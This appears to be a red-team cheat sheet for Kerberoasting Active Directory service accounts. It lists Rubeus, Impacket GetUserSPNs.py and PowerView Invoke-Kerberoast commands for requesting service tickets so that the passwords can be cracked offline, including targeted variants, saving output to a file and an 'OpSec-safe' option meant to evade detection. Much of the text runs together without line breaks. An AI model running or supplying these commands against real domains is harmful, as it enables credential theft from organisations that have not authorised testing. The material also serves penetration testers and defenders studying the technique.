# Generic Kerberoasting with Rubeus .\Rubeus.exe kerberoast/nowrap# Generic Kerberoasting and saving the output to a file.\Rubeus.exe kerberoast/nowrap/outfile:C:\Windows\Tasks\kerberoast.txt# Perform targeted Kerberoasting with Rubeus.\Rubeus.exe kerberoast/user:$serviceaccount# OpSec-safe Kerberoasting with the 'tgtdeleg' trick, filtering out AES-enabled accounts.\Rubeus.exe kerberoast/rc4opsec
Kerberoasting with Impacket
# List accounts with SPNsGetUserSPNs.py $domain/$username:$password -dc-ip $dcip# Generic Kerberoasting with ImpacketGetUserSPNs.py $domain/$username:$password -dc-ip $dcip -request# Targeted KerberoastGetUserSPNs.py $domain/$username:$password -dc-ip $dcip /user:$serviceaccount -request
Kerberoasting with PowerView
# Generic Kerberoast with PowerViewInvoke-Kerberoast|fl# Specify Domain in KerberoastInvoke-Kerberoast-Domain $domain |fl
